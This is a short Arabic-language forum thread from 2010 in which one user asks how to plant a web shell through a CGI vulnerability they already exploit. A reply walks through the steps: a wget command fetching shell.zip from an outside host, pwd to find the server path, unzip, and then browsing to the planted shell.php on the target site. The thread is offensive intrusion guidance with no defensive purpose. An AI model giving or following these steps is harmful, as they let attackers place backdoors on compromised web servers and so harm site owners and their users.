المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : سؤال بسيط لاختكم



adam30
11-11-2010, 10:49 PM
هل يمكن رفع شل عن طريق ثغرة cgi ,و ;كيف ربطه فأنى معى كل من الاستغلال و رفعت الشل على موقع و معى لينك له ارجو الرد
و شكرا

Hidden pain
11-12-2010, 03:42 PM
نعم يمكن رفع الشل عن طريق ثغرات الcgi
ذلك بأمر السحب wget
مثلا لسحب شل نكتب wget http:/www.lllll.com/shell.zip
طبعا المسار هو مسار الشل
ثم الأمر pwd لمعرفة المسار
ليكون رابط الملف المرفوع على السرفر هو مثلا home/www/www.target.com/shell.zip
باقي فك الضغط بالأمر unzip ثم رابط الملف المرفوع
و يكون الشل في نفس مكان الملف المضغوط الذي هو هنا target.com/shell.php
أرجو أن تكوني قد استفدت